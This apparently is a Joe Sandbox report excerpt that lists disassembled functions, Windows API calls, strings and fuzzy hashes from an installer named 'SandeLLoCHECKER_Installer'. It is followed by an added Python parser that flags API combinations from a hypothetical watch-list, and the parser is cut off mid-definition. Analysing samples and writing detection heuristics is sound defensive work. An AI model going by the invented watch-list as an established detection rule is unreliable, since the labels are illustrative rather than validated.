                                                                                                                        • String ID: shim_clone
                                                                                                                        • API String ID: 896069032-3944563459
                                                                                                                        • Opcode ID: d225fab5a9e989c5c7689118e53c30747d522c26867137b1cdbfde80363f3f40
                                                                                                                        • Instruction ID: 6ccbce02f36d919d584d9bb73e2b3f576eb3f7c20f1d2e7f8b8befe7967b2eb4
                                                                                                                        • Opcode Fuzzy Hash: d225fab5a9e989c5c7689118e53c30747d522c26867137b1cdbfde80363f3f40
                                                                                                                        • Instruction Fuzzy Hash: 81A11570A00658DFDB29DB24CC55BAAB7B9FF44300F5440ADE90AE7292DB349E44CF56

                                                                                                                        Control-flow Graph

[Control-flow graph rendering omitted: function at 947f20; basic blocks with API calls: FreeLibrary / EnterCriticalSection (94806d), DestroyWindow (9480ec)]
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00947F20: GetModuleFileNameW.KERNEL32(00000000,?,00000104,C7BA013E,00000000,?,00A7B216,000000FF), ref: 00947E68
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • FreeLibrary.KERNEL32(00000001,C7BA013E,?,00000001,?,?,?), ref: 009480B7
                                                                                                                        • EnterCriticalSection.KERNEL32(00B314EC), ref: 009480D2
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 009480F0
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B314EC), ref: 00948139
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalInit_thread_footerSection$DestroyEnterFileFreeHeapLeaveLibraryModuleNameProcessWindow
                                                                                                                        • String ID: v$%s%lu$.local
                                                                                                                        • API String ID: 3496055493-1141559199
                                                                                                                        • Opcode ID: aa14e630b5643752316bc2333a95dc684ac6d75d689ac0eee378daaeed288670
                                                                                                                        • Instruction ID: bd6e639ada706dc98219bac6ce3d8aa3ce242048965ae11a136d8d5d64ee7e5b
                                                                                                                        • Opcode Fuzzy Hash: aa14e630b5643752316bc2333a95dc684ac6d75d689ac0eee378daaeed288670
                                                                                                                        • Instruction Fuzzy Hash: 8191CC71A01205DFDB20DF68C844BAFBBF8FF44314F14856AE815AB391DB749804CB91

                                                                                                                        Control-flow Graph

[Control-flow graph rendering omitted: function at 84f120; basic block with API call: InterlockedPushEntrySList (84f289)]
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$Windows.Foundation.Uri$combase.dll
                                                                                                                        • API String ID: 0-3956872289
                                                                                                                        • Opcode ID: b596cd22f14d968a4134b99b76456c22b181182cafc213723b8d5de89ed1b408
                                                                                                                        • Instruction ID: ce3de949a4abf5c5da06deda69d565500c3715a417d504449ed141f6205c505a
                                                                                                                        • Opcode Fuzzy Hash: b596cd22f14d968a4134b99b76456c22b181182cafc213723b8d5de89ed1b408
                                                                                                                        • Instruction Fuzzy Hash: D1517971D0021DEFDB00DFA8C945BAEBBB4FF08718F204569E915AB391DBB56A04CB91

                                                                                                                        Control-flow Graph

[Control-flow graph rendering omitted: function at 988f10; basic blocks with API calls: CreateFileW (989094), SetFilePointer / SetEndOfFile (98912d), CloseHandle (989156)]
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,?,00000000,?,?,C7BA013E), ref: 009890D6
                                                                                                                        • SetFilePointer.KERNEL32(?,7FFFFFFF,00000000,00000000,?), ref: 00989135
                                                                                                                        • SetEndOfFile.KERNEL32(?), ref: 0098913E
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00989157
                                                                                                                        Strings
                                                                                                                        • Not enough disk space to extract file:, xrefs: 00988FDA
                                                                                                                        • %sholder%d.aiph, xrefs: 009890B2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandlePointer
                                                                                                                        • String ID: %sholder%d.aiph$Not enough disk space to extract file:
                                                                                                                        • API String ID: 22866420-929304071
                                                                                                                        • Opcode ID: 138869a08d704254e3cae4dcb9edfbc4f82a065322206ab023fb02a6bd29091a
                                                                                                                        • Instruction ID: c52c8c66b9e38bc5be5d26766ee5c1c446d3871c5b6db2aba4b2364cdc880858
                                                                                                                        • Opcode Fuzzy Hash: 138869a08d704254e3cae4dcb9edfbc4f82a065322206ab023fb02a6bd29091a
                                                                                                                        • Instruction Fuzzy Hash: C0819175A042099FDB10EF68CC49BAEB7B9FF49324F184629F915E7391DB719900CB90

                                                                                                                        Control-flow Graph

[Control-flow graph rendering omitted: function at 9a4780; basic blocks with API calls: SetFilePointer (9a481b), GetLastError (9a4834), ReadFile (9a4842), SetFilePointer (9a48f6), ReadFile (9a491e)]
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNEL32(00A8CA8D,-00000400,?,00000002,00000400,C7BA013E,?,?,?), ref: 009A4826
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 009A4834
                                                                                                                        • ReadFile.KERNEL32(00A8CA8D,00000000,00000400,?,00000000,?,?), ref: 009A484F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$ErrorLastPointerRead
                                                                                                                        • String ID: ADVINSTSFX
                                                                                                                        • API String ID: 64821003-4038163286
                                                                                                                        • Opcode ID: 899610e73e42f787d2ab07c3a15d0bcb142b07a75c60fd8e375b197791371521
                                                                                                                        • Instruction ID: 8612dba6167097e569c2a27a7744bdf2c688856f69114a83cfc8f9df19c17483
                                                                                                                        • Opcode Fuzzy Hash: 899610e73e42f787d2ab07c3a15d0bcb142b07a75c60fd8e375b197791371521
                                                                                                                        • Instruction Fuzzy Hash: 3461B371A002499FDB00CFA8D880BBFBBB9FB86724F244665E515A7281D7789D45CBE0

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00982300
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00982316
                                                                                                                        • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,0098AB7A,?,?,?,?,?,?), ref: 0098232F
                                                                                                                        • InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,0098AB7A,?,?), ref: 0098233A
                                                                                                                        • GetDlgItem.USER32(00000000,000003E9), ref: 0098234C
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00982362
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,?,?,?,0098AB7A), ref: 009823A5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Rect$Item$InvalidateShow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2147159307-0
                                                                                                                        • Opcode ID: 5cfe8a79f7f060859f91e3f5c3dd462e6b4bd9bda7f882994b5240f7efa98b51
                                                                                                                        • Instruction ID: 1300c9deac49a6b0ba6810807c171586be17cf4a906cbda263a7e09d6cb78f52
                                                                                                                        • Opcode Fuzzy Hash: 5cfe8a79f7f060859f91e3f5c3dd462e6b4bd9bda7f882994b5240f7efa98b51
                                                                                                                        • Instruction Fuzzy Hash: 6F216B71604301AFD310DF38DC49A6B7BE9EF8D704F008629F859D7291EB70E9428B92
                                                                                                                        APIs
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,009964DA,?,C7BA013E,?,?,?,?,00A89C55,000000FF), ref: 0099850D
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,009964DA,?,C7BA013E,?,?,?,?,00A89C55,000000FF,?), ref: 0099852E
                                                                                                                        • InternetOpenW.WININET(AdvancedInstaller,00000003,00000000,00000000,10000000), ref: 0099857B
                                                                                                                        • GetLastError.KERNEL32(?,C7BA013E,?,?,?,?,00A89C55,000000FF,?,00995E0D,?,?,00000000,?,?), ref: 0099858E
                                                                                                                        • InternetSetStatusCallbackW.WININET(00000000,009985B0), ref: 0099859D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateEventInternet$CallbackErrorLastOpenStatus
                                                                                                                        • String ID: AdvancedInstaller
                                                                                                                        • API String ID: 2592705480-1372594473
                                                                                                                        • Opcode ID: 36b491934217a997c4d2a1b6f2ba34f3b14e037a09b857c788b0bfee9fc70d84
                                                                                                                        • Instruction ID: efc5ef67a9e45b6d8395208c159ebd8f75764ba360e9745db79ef893ffd59720
                                                                                                                        • Opcode Fuzzy Hash: 36b491934217a997c4d2a1b6f2ba34f3b14e037a09b857c788b0bfee9fc70d84
                                                                                                                        • Instruction Fuzzy Hash: BC114971340602BFEB20CB39CC8AF26BBA8FB84705F214429F505DB290DB71E856CB91
                                                                                                                        APIs
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,C7BA013E,?,00000000,?,?,?,?,?,?,00000000,00A8CE1D,000000FF), ref: 009A5A00
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,009A5D70,?,00000000,?), ref: 009A5A36
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009A5B40
                                                                                                                        • GetExitCodeThread.KERNEL32(00000000,?), ref: 009A5B4B
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 009A5B6B
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,C7BA013E,?,?,?), ref: 009A5BD4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateObjectSingleThreadWait$AllocateCloseCodeEventExitHandleHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3066744267-0
                                                                                                                        • Opcode ID: e99693afe051ea1eddd6ff23c2b44ef7ba5dfefb1bb921c3cfb9c6c5611d0a6d
                                                                                                                        • Instruction ID: 9817d6b992f644dd7b266cfa0e86bd557f2a5a8ab89d2edd8f2158851adf619e
                                                                                                                        • Opcode Fuzzy Hash: e99693afe051ea1eddd6ff23c2b44ef7ba5dfefb1bb921c3cfb9c6c5611d0a6d
                                                                                                                        • Instruction Fuzzy Hash: 35C13975B006159FCB14CF68C984BAEBBF5FF49710F2586A9E815AB391D730E901CBA0
                                                                                                                        APIs
                                                                                                                        • PathIsUNCW.SHLWAPI(?,C7BA013E,?,?,?,?,?,?,00A7F415,000000FF,?,009855E4,?,?,?), ref: 00960F6B
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00ABAD74,00000001,?), ref: 0096102A
                                                                                                                        • GetLastError.KERNEL32 ref: 00961038
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectoryErrorLastPath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 953296794-0
                                                                                                                        • Opcode ID: 621e91f269bf825d529f4661db3226fb5f02b1deab9d931adfb5491c65a4ee45
                                                                                                                        • Instruction ID: 71a9f594eb56c45f3cd405d1d119a5bab9917450571b7e524e29129fa4b6213f
                                                                                                                        • Opcode Fuzzy Hash: 621e91f269bf825d529f4661db3226fb5f02b1deab9d931adfb5491c65a4ee45
                                                                                                                        • Instruction Fuzzy Hash: 3281C131A042099FDB10DFA8C885B9EBBB8FF55320F284269E925E72D1DB749905CB91
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,009A6800,00AC7444,00000000,?), ref: 0098ADDD
                                                                                                                        • GetLastError.KERNEL32 ref: 0098ADEA
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 0098AE13
                                                                                                                        • GetExitCodeThread.KERNEL32(00000000,?), ref: 0098AE2D
                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 0098AE45
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0098AE4E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleTerminateWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1566822279-0
                                                                                                                        • Opcode ID: efdc0b99bf793979a368c941a2ec3a0b24f71fe13501d662e29785d2b49f70b2
                                                                                                                        • Instruction ID: 273516deff742e3aaf1ae33314607e15a9725f0c352e4763f3f68e884b9d0d7b
                                                                                                                        • Opcode Fuzzy Hash: efdc0b99bf793979a368c941a2ec3a0b24f71fe13501d662e29785d2b49f70b2
                                                                                                                        • Instruction Fuzzy Hash: 6631B975900209AFDF10DF94CD09BDEBBB8FB08714F104629E825A62D1DB799A05CFA5
                                                                                                                        APIs
                                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(80004005,00A87685,C7BA013E,?,?,00000000,?,?,00000000,00A87685,000000FF,?,80004005,C7BA013E,?), ref: 0096B105
                                                                                                                        • GetFileVersionInfoW.KERNELBASE(80004005,?,00000000,000000FF,00000000,?,00000000,?,?,00000000,00A87685,000000FF,?,80004005,C7BA013E,?), ref: 0096B153
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileInfoVersion$Size
                                                                                                                        • String ID: ProductName$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                                                                                                                        • API String ID: 2104008232-2149928195
                                                                                                                        • Opcode ID: a3f85c356423b9cfc1f6f5673f7695f83e340acbfeaf9bb5ea0b2337e6c87f85
                                                                                                                        • Instruction ID: 1f0b506e118486fd2959a229af6d0ab7448fdae36a21f1f1d669aa419d32dd91
                                                                                                                        • Opcode Fuzzy Hash: a3f85c356423b9cfc1f6f5673f7695f83e340acbfeaf9bb5ea0b2337e6c87f85
                                                                                                                        • Instruction Fuzzy Hash: 4761DE71901209EFDB14DFA8C959AAFB7F8FF15314F148129E821E7291EB309D44CBA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0096AA80: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,C7BA013E,00000000,00000000,?), ref: 0096AADB
                                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(?,000000FF,Shlwapi.dll,C7BA013E,00000000,?,?,00000000,00A80B25,000000FF,Shlwapi.dll,0096AF46,?,?,?), ref: 0096AFDD
                                                                                                                        • GetFileVersionInfoW.KERNELBASE(?,?,?,00000000,00000000,?,?), ref: 0096B009
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 0096B04E
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0096B061
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$InfoVersion$DeleteErrorFolderLastPathSize
                                                                                                                        • String ID: Shlwapi.dll
                                                                                                                        • API String ID: 2825328469-1687636465
                                                                                                                        • Opcode ID: 7ae8b63708b76b46128e1c1fc01c0b4f7dbe6180a0d8fbf093e8b80aebd1e1aa
                                                                                                                        • Instruction ID: 8dac2b196c6a58ebea82b8b924607c8b6bd19e9a19df5c0114a2c44c8abc780c
                                                                                                                        • Opcode Fuzzy Hash: 7ae8b63708b76b46128e1c1fc01c0b4f7dbe6180a0d8fbf093e8b80aebd1e1aa
                                                                                                                        • Instruction Fuzzy Hash: 49315CB1901209EFDB11DFA5C985BEFBBBCEF08310F14412AE815E3291EB359944CBA1
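The function entries above are the form in which a Joe Sandbox report exposes per-function API sequences and the Opcode ID / Instruction Fuzzy Hash values that can be pivoted on across reports. The parser below is an added example, not code from Joe Sandbox or from the report; it infers the entry layout from the listing itself (an "APIs" header opens each entry, bullet lines are either API calls with a "ref:" address or "Key: value" fields), turns the entries into records, and flags API combinations from a hypothetical watch-list. The two sample entries are copied from the listing above; the watch-list labels are invented for the example.

```python
"""Parse Joe Sandbox 'IDA Plugin' function entries into records and flag API
combinations worth a second look.  Added example; the entry layout is inferred
from the report text and the watch-list below is hypothetical."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample: two entries copied from the report listing above.
SAMPLE = """\
APIs
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,009964DA,?,C7BA013E,?,?,?,?,00A89C55,000000FF), ref: 0099850D
• InternetOpenW.WININET(AdvancedInstaller,00000003,00000000,00000000,10000000), ref: 0099857B
• GetLastError.KERNEL32(?,C7BA013E,?,?,?,?,00A89C55,000000FF,?,00995E0D,?,?,00000000,?,?), ref: 0099858E
• InternetSetStatusCallbackW.WININET(00000000,009985B0), ref: 0099859D
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
Similarity
• API ID: CreateEventInternet$CallbackErrorLastOpenStatus
• String ID: AdvancedInstaller
• API String ID: 2592705480-1372594473
• Opcode ID: 36b491934217a997c4d2a1b6f2ba34f3b14e037a09b857c788b0bfee9fc70d84
• Instruction Fuzzy Hash: BC114971340602BFEB20CB39CC8AF26BBA8FB84705F214429F505DB290DB71E856CB91
APIs
• CreateThread.KERNEL32(00000000,00000000,009A6800,00AC7444,00000000,?), ref: 0098ADDD
• GetLastError.KERNEL32 ref: 0098ADEA
• WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 0098AE13
• GetExitCodeThread.KERNEL32(00000000,?), ref: 0098AE2D
• TerminateThread.KERNEL32(00000000,00000000), ref: 0098AE45
• CloseHandle.KERNEL32(00000000), ref: 0098AE4E
Similarity
• API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleTerminateWait
• String ID:
• API String ID: 1566822279-0
• Opcode ID: efdc0b99bf793979a368c941a2ec3a0b24f71fe13501d662e29785d2b49f70b2
• Instruction Fuzzy Hash: 6631B975900209AFDF10DF94CD09BDEBBB8FB08714F104629E825A62D1DB799A05CFA5
"""

# API call line: optional "Part of subcall function X:" prefix, Name.MODULE(args), ref: addr
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
# Any other bullet line is "Key: value" (value may be empty, e.g. "String ID:")
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?): ?(?P<val>.*)$")

# Hypothetical watch-list: API names that, seen together in one function, merit review.
WATCHLIST: Dict[str, Set[str]] = {
    "wininet-with-status-callback": {"InternetOpenW", "InternetSetStatusCallbackW"},
    "thread-forcibly-terminated": {"CreateThread", "TerminateThread"},
    "runtime-import-resolution": {"LoadLibraryW", "GetProcAddress"},
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None


@dataclass
class FunctionEntry:
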